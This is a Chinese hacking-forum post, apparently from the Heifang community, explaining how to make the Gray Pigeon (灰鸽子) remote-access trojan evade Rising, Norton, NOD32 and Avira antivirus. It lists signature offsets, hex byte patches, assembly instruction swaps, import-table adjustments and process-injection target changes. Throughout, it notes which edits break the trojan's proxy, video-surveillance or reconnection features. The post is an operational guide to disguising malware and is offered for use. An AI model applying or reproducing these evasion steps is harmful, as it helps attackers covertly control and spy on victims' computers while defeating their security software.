黑防灰鸽子特征免杀
给大家带一个黑防灰鸽子特征码关键几处影响到灰鸽子使用修改方法。。,下面的特征码主要是针对瑞星的,生成能过表明,内存,主动防御。。。一.改插入进程
搜索关键字\Program Files\Internet Explorer\IEXPLORE.EXE
修改成为\Program Files\Outlook Express\msimn.exe.....
\WINDOWS\system32\svchost.exe................
\Windows\System32\Winlogon.exe
IEXPLORE.EXE
Winlogon.exe
另外一处IEXPLORE.EXE修改成为msimn.exe 否则不能上线
C:\Program Files\Outlook Express\msimn.exe------消息广播不能发送这里修改 影响这个的看我演示
看没消息了。。。。
不好意思
黑防专版 ----沉默远控德才兼备
灰鸽子远程控**务端安装----书山有路勤为径学海无涯苦
系统芯片----我爱的心
物理内存---智脑内心
Windows版本----xiaojun型号
Windows目录----xiaojun路径
注册公司-----我的女人
注册用户---我的玫瑰------------------------主动特征码:0009F4E3_00000002
当前用户----现在的你
当前日期----现在日子
开机时间----恋爱时候
计算机名称---我的爱人是
窗口分辨率----女人好看否
剪切板内容为空或非文本信息---------学海无涯古作舟咋能没结果
打开文件失败-----无法显示爱情
无插件----没外遇
-------------无法在任务管理器里面隐藏
56 00 43 00 32 00 35 00 50 00 4A 00 55 00 4C 00 30 00 VC259JUL03 (用0填充)
删除 DVCLAL
0x0005FCA2 u--U 55---75
0x0005FE1A BF F1 正在传送数据
0x0009F552 3A--3B 机名称:---;
0x000A0B5B 09---FF20--00----- if exit uninstal.bat 无法自动删除 360报告灰 鸽子变种残留(006).此处修改会导致无法自动删除 uninstal.bat 文件
0x000B7C3E 65--45 72没找到
0x000B7E15 00-- FF
0x000B9097 000b96d0h: -----上线加密 金山
[特征] 000A0AF7_00000001004A16F7 向后偏移两字节
[特征] 000A1257_00000001004A1E57 改上面1E48的mov ecx,5 反映变慢
重装了个另外版的瑞星,原来免费2008版本免杀的就被杀了02---00 --05??
-------------------------------------------------------------(1)
[特征] 000A0DB8_00000001 26改27
[特征] 0008B425_0000000150 改为 51
[特征] 000933FE_00000001 填充0
[特征] 00094B3E_00000001 01改02 远程视频断开,无法使用 再看这一处吧。按照网上的方法 会影响 视频监控的哦 。。看我改
[特征] 000973EA_00000001 填充0
[特征] 0009A8A3_00000001 13改14 停止代理的时候 没有反映 出错了。。。动不了
[特征] 0009AD0D_00000001 38改37 代理无法正常运行
[特征] 0009CBBC_00000001 DB 改为DE代理无法正常运行
[特征] 0009DC3E_00000001 07 改06
[特征] 0009EC44_00000001 填充0 无法使用代理功能。。。
[特征] 0009F3F6_00000001 08改07 这处会导致系统信息无法正常显示
[特征] 0009F5A7_0000000175改76
000A14C3_000000014A改4B
[特征] 000B9A03_00000001 GrayPigeon 改 gRAYpIGEON代理问题
0009B679_00000001 0049C279 16进制5A改为5C
000A158A_00000001 004A218A修改大小写 X---x
[特征] 00069416_00000001 0046A01616进制46改为45还有这些 都要影响代理运行的哦,我就不具体修改了
[特征] 000A1301_00000001 004A1F01B7改为B6无法运行
000A0AF7_00000001 004A16F7修改大小写 P---p无法生成正常文件
0005FDEB_00000001 004609EB无效的缓冲区虚拟内存过低
0009748D_00000001 0049808D特征码上方,黑客动画吧00改变01
[特征] 000A0DB7_00000002这一处连续的数字可以加减.把26改成27 找不到。。。74
[特征] 0009BBB7_00000002跳到这一处是字母.可以修改大小写 r--R
起始偏移 000B9A4D 偏移大小 00000007大小写反转000B9A4D_000B9A54
-------------------------------------------------------------------------(2)
[特征] 00006DE7_00000001 004079E7 movdword ptr , eax movsxeax, word ptr 调换位置
[特征] 0005FCA9_00000001004608A9xor 改为or 004608A9
[特征] 0005FCB5_00000001 004608B5 TESTESI, ESI改位 XORESI, ESI
[特征] 00091C26_00000001 00492826 POP ESI POP EDI 互换位置
[特征] 00099481_00000001 0049A081 OREAX, 595AC033 改 XOREAX, 595AC033
[特征] 0009A87A_00000001 0049B47Apush 0 改为push 6
[特征] 000A0DD2_00000001004A19D2push -1 改位 psuh -2
[特征] 000A12A2_00000001 004A1EA2testeax, eax testbl, bltest改or
[特征] 000A12A8_00000001同上--------------没该。。
[特征] 0005FDFB_00000001 004609FB MOVEDI, D4C4B5D5 MOVDH, B3 调换位置 空的远程地址远程地址为空---找不到
[特征] 0009AB3C_00000001 0049B73C call 0042CA70 互换位置 call 0042ca60 然后修改xor ecx ecx为or--------------------这处修改后,只能上线一次,客户端重新打开就不能上线了。。。。
[特征] 000A0A46_00000001004A1646 注意观察寄存器的变化。
004A16446A 00 push0
004A16466A 00 push0
004A16486A 40 push40
004A21ED00 db00 这一处没有修改
004A164A90 nop
v004A164A |. 6A 00 push0
00096F4A_00000001 00497B4AJNZ修改为JZ
0009B9C3_00000001 0049C5C3特征码上方JNZ改为JZ
000B9A4F_00000001 004C0E4F特征码上方小循环处的SBB改为SUB
--------------------------只上线一次????(3)--------------------------------------------------------
--------------------
诺顿的:
0000ACEB_00000002 内存地址:0040B8EB(由je改jng)
[特征] 000A12A1_00000002用OC转换下内在地址.004A1EA1 test---or 是XOR,不修改。
00A14F4_00000001 004A20F4 一处,两行代码换位.
004A20F2 C605 647F4A00>MOV BYTE PTR DS:,2
004A20F9 A1 FC584A00 MOV EAX,DWORD PTR DS:[4A58FC
mov byte ptr ds:,1
mov eax,dword ptr ds:
00094B3E_00000001 0049573E 特征码处CMP改为SUB 可以的吧,,还免杀的呢 。。
000973EA_00000001 00497FEA 特征码NOP掉后空一格汇编
0009AB3C_00000001 0049B73C 特征码NOP掉后,空一格汇编 0049B73C 8519 test dword ptr ds:,ebx
这处 不断弹处access violation at address 00403D7E in modele 'svchost.exe'.Read of address FF645754
0009CBBC_00000001 0049D7BC特征及上面两行代码黑客动画吧NOP后空一格再黑客动画吧粘贴. E8 FB 9F F6 FF 8B D8 85 DB
0009F5A7_00000001 004A01A7 特征码NOP后空一格汇编. 004A1E49 5.<Modu> 8BEC mov ebp,esp
000A0A46_00000001 004A1646
004A1644 6A 00 PUSH 0
004A1646 6A 00 PUSH 0
004A1648 6A 40 PUSH 40
004A164A 6A 00 PUSH 0
004A164C 6A 00 PUSH 0
004A164E 6A 00 PUSH 0
改为
004A1644 |. 50 PUSH EAX
004A1645 |. 6A 00 PUSH 0
004A1647 |. 6A 00 PUSH 0
004A1649 |. 6A 40 PUSH 40
004A164B |. 6A 00 PUSH 0
004A164D |. 6A 00 PUSH 0
004A164F |. 50 PUSH EAX
000A0DBF_00000001 004A19BF
004A19BC 50 PUSH EAX
004A19BD 6A 00 PUSH 0
004A19BF 6A 00 PUSH 0
改为
004A19BC |. 6A 00 PUSH 0
004A19BE |. 6A 00 PUSH 0
004A19C0 |. 50 PUSH EAX
000A12A8_00000001 004A1EA8
004A1EA7 /74 11 JE SHORT CServer.004A1EBA
004A1EA9 |C605 647F4A00>MOV BYTE PTR DS:,0
以上两行代码换位.
000A14C3_00000001 004A20C3
68 BC 21 4A
68 BC 20 4A
[特征] 000A0933_00000001 004A1533
[特征] 000A0A00_00000001 004A1600
一二处修改方法一样,两处CALL地址换位.
004A152E |. E8 3921F6FF CALL 0040366C
004A1533 |. E8 9413F6FF CALL 004028CC
----------------本地测试,关了客户端后,无法再次上线
Idle,Idle
-Tcp stata=Time_wait,local 10.9.228.86:8000 Remote 10.9.227.86:1050
-state=time_wait,local 10.9.227.86:8000 remote 10.9.227.86:1049
-----------------------(4) 二次上线有点慢,功能基本都在---------------------
[特征] 0005FF3A_00000001 00460B3ATEXT --XOR,JE-JLE
[特征] 0009A86D_00000002 0049B46D OR--XOR
[特征] 0009C73F_00000002 0049D33Fjnz----jmp
[特征] 0009B963_00000002 0049C563jnz----jmp
[特征] 0009B58A_00000002 0049C18A jnz----jmp
[特征] 0009AD0D_00000001 0049B90DJE--jle
[特征] 0009B913_00000002 0049C513jnz----jmp
[特征] 0005FDFB_00000001
004609FB C4二进制移到00
[特征] 0005F845_00000001 00460445PUSH -1----PUSH -2
[特征] 0005FBE0_00000001 004607E0Jnz---jb
[特征] 000317F5_00000002 004323F5定位出错?CALL换行
1[特征] 00012B3F_00000002 0041373FADD改SUB
[特征] 0006D2D8_000000010046DED8d--D
[特征] 000A15BF_00000001004A21BF00填充 5[特征] 000A15BE_00000002 字符替换法 学习(可以直接删除,0替换)
[特征] 00068BEE_00000002 修改字符串大小写法
[特征] 0009ADFE_00000001w--W (www)
[特征] 0009ADF7_00000002 直接修改特征码的十六进制法09----08
----------------------(5)------------------------------------------------------------------
瑞星主动
[特征] 0005FFB4_00000002
[特征] 0005FFCE_00000002
未知错误代号 ---未来世界探秘
正在查找错误信息----我的心在空中飞翔
修改内核内存数据:
\Device\PhysicalMemory
nod32
[特征] 00006434_00000001 00407034 jmp dword ptr ds: NOP 下移jmp 站四个字节
0000ACEB_00000002 内存地址:0040B8EB(由je改jng)
小红伞
[特征] 000B27AC_00000001 上面
BBCANCEL
BBIGNORE 上下字符互换
文件地址 内存地址 文件字符串 函数指针地址
7[特征] 000A6EFB_00000002 004AACFB ShellExecuteA 输入表函数调整对应内存地址004A89A0,文件地址000A4BA0对应的指针EE----ED
8[特征] 000A6F2B_00000002 004AAD2B InternetOpenUrlA 输入表函数调整000A4BAC
9[特征] 000A695F_00000002 004AA75F FindWindowA 输入表函数调整000A4A60
-------------------------------------------------------------------
口点加一,不会瑞星全部查杀
特征码 物理地址/物理长度 如下:
[特征] 000317F5_00000001
[特征] 0009A67A_00000001------00填充
[特征] 0009B7D7_00000001
[特征] 0009B925_00000001
[特征] 0009CBE6_00000001
[特征] 0009E5AA_00000001
[特征] 0009EC44_00000001
[特征] 0009F3F6_00000001
[特征] 000B99B7_00000001----n---N
特征码分布示意图:
[--------------------------------------------------]
[-----------------M--------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[--------MM-M-MM----------------------------------M]
页:
[1]